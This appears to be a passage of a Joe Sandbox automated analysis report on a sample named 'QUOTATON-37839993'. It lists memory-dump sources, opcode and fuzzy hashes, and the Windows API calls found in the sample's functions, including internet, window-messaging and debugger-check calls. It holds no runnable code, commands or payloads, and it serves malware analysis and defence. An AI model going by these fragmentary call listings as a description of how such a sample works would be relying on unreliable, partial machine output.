                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: ClearVariant
                                                                      • String ID: Dd$Dd
                                                                      • API String ID: 1473721057-2413357308
                                                                      • Opcode ID: a7440a28ebecd5f47c49b388a0947f152b7f4fcf8407d9c8a8e5e65f6524e476
                                                                      • Instruction ID: 98f4fe4484eeaada1015fd613020888344f9b5609f23f45f15bb24fc9dcd55a4
                                                                      • Opcode Fuzzy Hash: a7440a28ebecd5f47c49b388a0947f152b7f4fcf8407d9c8a8e5e65f6524e476
                                                                      • Instruction Fuzzy Hash: D65114B86053058FD754DF19C580A1ABBF1BB99344F58A82DE985AB3A1D332E881CB42
                                                                      APIs
                                                                      • _memset.LIBCMT ref: 00E7259E
                                                                      • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 00E725D4
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: CrackInternet_memset
                                                                      • String ID: |
                                                                      • API String ID: 1413715105-2343686810
                                                                      • Opcode ID: f0d6bacb707eceb0cea19495934bf240dfdb0aa476bc6aae1b1a5a39ad8e236c
                                                                      • Instruction ID: 4ae60f1ecb1cb680173edb11e42513063dff451418f13472d6e2eb7547bca492
                                                                      • Opcode Fuzzy Hash: f0d6bacb707eceb0cea19495934bf240dfdb0aa476bc6aae1b1a5a39ad8e236c
                                                                      • Instruction Fuzzy Hash: F1311871D00119ABCF11AFA0CC85EEEBFB8FF08350F14605AF958B6162DB315995DB60
                                                                      APIs
                                                                      • SendMessageW.USER32(?,00001132,00000000,?), ref: 00E87B61
                                                                      • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00E87B76
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend
                                                                      • String ID: '
                                                                      • API String ID: 3850602802-1997036262
                                                                      • Opcode ID: 1a46a5b7f08530d8a2e0b50c2abdcfc92cc5d23f434a998f89f5889858145548
                                                                      • Instruction ID: 9cd9d2c6ae5532dd16ffbf527b82943ec0101fef6a3edbe95d010fc855a63d13
                                                                      • Opcode Fuzzy Hash: 1a46a5b7f08530d8a2e0b50c2abdcfc92cc5d23f434a998f89f5889858145548
                                                                      • Instruction Fuzzy Hash: 3B412875A042099FDB14DF65C981BEABBF6FB08304F20116AED48AB391D771A981CF90
                                                                      APIs
                                                                      • DestroyWindow.USER32(?,?,?,?), ref: 00E86B17
                                                                      • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00E86B53
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: Window$DestroyMove
                                                                      • String ID: static
                                                                      • API String ID: 2139405536-2160076837
                                                                      • Opcode ID: db36754a3de1474a1bfbb12096331d8f452f666e9fbe0a29cde26792dc642115
                                                                      • Instruction ID: 965c3404510346a29143eb16ed21cdc4f9d8554db2cc7181347142f1930a5d82
                                                                      • Opcode Fuzzy Hash: db36754a3de1474a1bfbb12096331d8f452f666e9fbe0a29cde26792dc642115
                                                                      • Instruction Fuzzy Hash: AF318F71100604AEDB10AF64CC41AFB73B9FF48764F10A619F9ADE7190DA31AC81C760
                                                                      APIs
                                                                      • _memset.LIBCMT ref: 00E62911
                                                                      • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00E6294C
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: InfoItemMenu_memset
                                                                      • String ID: 0
                                                                      • API String ID: 2223754486-4108050209
                                                                      APIs
                                                                      • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00E86761
                                                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00E8676C
                                                                      Strings
                                                                      Similarity
                                                                      • API ID: MessageSend
                                                                      • String ID: Combobox
                                                                      • API String ID: 3850602802-2096851135
                                                                      APIs
                                                                        • Part of subcall function 00E01D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00E01D73
                                                                        • Part of subcall function 00E01D35: GetStockObject.GDI32(00000011), ref: 00E01D87
                                                                        • Part of subcall function 00E01D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00E01D91
                                                                      • GetWindowRect.USER32(00000000,?), ref: 00E86C71
                                                                      • GetSysColor.USER32(00000012), ref: 00E86C8B
                                                                      Strings
                                                                      Similarity
                                                                      • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                      • String ID: static
                                                                      • API String ID: 1983116058-2160076837
                                                                      APIs
                                                                      • GetWindowTextLengthW.USER32(00000000), ref: 00E869A2
                                                                      • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00E869B1
                                                                      Strings
                                                                      Similarity
                                                                      • API ID: LengthMessageSendTextWindow
                                                                      • String ID: edit
                                                                      • API String ID: 2978978980-2167791130
                                                                      APIs
                                                                      • _memset.LIBCMT ref: 00E62A22
                                                                      • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00E62A41
                                                                      Strings
                                                                      Similarity
                                                                      • API ID: InfoItemMenu_memset
                                                                      • String ID: 0
                                                                      • API String ID: 2223754486-4108050209
                                                                      APIs
                                                                      • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00E7222C
                                                                      • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00E72255
                                                                      Strings
                                                                      Similarity
                                                                      • API ID: Internet$OpenOption
                                                                      • String ID: <local>
                                                                      • API String ID: 942729171-4266983199
                                                                      APIs
                                                                        • Part of subcall function 00E07DE1: _memmove.LIBCMT ref: 00E07E22
                                                                        • Part of subcall function 00E5AA99: GetClassNameW.USER32(?,?,000000FF), ref: 00E5AABC
                                                                      • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00E58E73
                                                                      Strings
                                                                      Similarity
                                                                      • API ID: ClassMessageNameSend_memmove
                                                                      • String ID: ComboBox$ListBox
                                                                      • API String ID: 372448540-1403004172
                                                                      APIs
                                                                      Strings
                                                                      Similarity
                                                                      • API ID: __fread_nolock_memmove
                                                                      • String ID: EA06
                                                                      • API String ID: 1988441806-3962188686
                                                                      APIs
                                                                        • Part of subcall function 00E07DE1: _memmove.LIBCMT ref: 00E07E22
                                                                        • Part of subcall function 00E5AA99: GetClassNameW.USER32(?,?,000000FF), ref: 00E5AABC
                                                                      • SendMessageW.USER32(?,00000180,00000000,?), ref: 00E58D6B
                                                                      Strings
                                                                      Similarity
                                                                      • API ID: ClassMessageNameSend_memmove
                                                                      • String ID: ComboBox$ListBox
                                                                      • API String ID: 372448540-1403004172
                                                                      APIs
                                                                        • Part of subcall function 00E07DE1: _memmove.LIBCMT ref: 00E07E22
                                                                        • Part of subcall function 00E5AA99: GetClassNameW.USER32(?,?,000000FF), ref: 00E5AABC
                                                                      • SendMessageW.USER32(?,00000182,?,00000000), ref: 00E58DEE
                                                                      Strings
                                                                      Similarity
                                                                      • API ID: ClassMessageNameSend_memmove
                                                                      • String ID: ComboBox$ListBox
                                                                      • API String ID: 372448540-1403004172
                                                                      APIs
                                                                      • VariantInit.OLEAUT32(?), ref: 00E5C534
                                                                        • Part of subcall function 00E5C816: _memmove.LIBCMT ref: 00E5C860
                                                                        • Part of subcall function 00E5C816: VariantInit.OLEAUT32(00000000), ref: 00E5C882
                                                                        • Part of subcall function 00E5C816: VariantCopy.OLEAUT32(00000000,?), ref: 00E5C88C
                                                                      • VariantClear.OLEAUT32(?), ref: 00E5C556
                                                                      Strings
                                                                      Similarity
                                                                      • API ID: Variant$Init$ClearCopy_memmove
                                                                      • String ID: d}
                                                                      • API String ID: 2932060187-1207350282
                                                                      APIs
                                                                      Strings
                                                                      Similarity
                                                                      • API ID: ClassName_wcscmp
                                                                      • String ID: #32770
                                                                      • API String ID: 2292705959-463685578
                                                                      APIs
                                                                        • Part of subcall function 00E3B314: _memset.LIBCMT ref: 00E3B321
                                                                        • Part of subcall function 00E20940: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00E3B2F0,?,?,?,00E0100A), ref: 00E20945
                                                                      • IsDebuggerPresent.KERNEL32(?,?,?,00E0100A), ref: 00E3B2F4
                                                                      • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00E0100A), ref: 00E3B303
                                                                      Strings
                                                                      • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00E3B2FE
                                                                      Similarity
                                                                      • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
                                                                      • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                      • API String ID: 3158253471-631824599
                                                                      APIs
                                                                      • GetSystemDirectoryW.KERNEL32(?), ref: 00E41775
                                                                        • Part of subcall function 00E7BFF0: LoadLibraryA.KERNEL32(kernel32.dll,?,00E4195E,?), ref: 00E7BFFE
                                                                        • Part of subcall function 00E7BFF0: GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00E7C010
                                                                      • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 00E4196D
                                                                      Strings
                                                                      Similarity
                                                                      • API ID: Library$AddressDirectoryFreeLoadProcSystem
                                                                      • String ID: WIN_XPe
                                                                      • API String ID: 582185067-3257408948
                                                                      APIs
                                                                      • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00E859AE
                                                                      • PostMessageW.USER32(00000000), ref: 00E859B5
                                                                        • Part of subcall function 00E65244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00E652BC
                                                                      Strings
                                                                      Similarity
                                                                      • API ID: FindMessagePostSleepWindow
                                                                      • String ID: Shell_TrayWnd
                                                                      • API String ID: 529655941-2988720461
                                                                      APIs
                                                                      • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00E8596E
                                                                      • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00E85981
                                                                        • Part of subcall function 00E65244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00E652BC
                                                                      Strings
                                                                      Similarity
                                                                      • API ID: FindMessagePostSleepWindow
                                                                      • String ID: Shell_TrayWnd
                                                                      • API String ID: 529655941-2988720461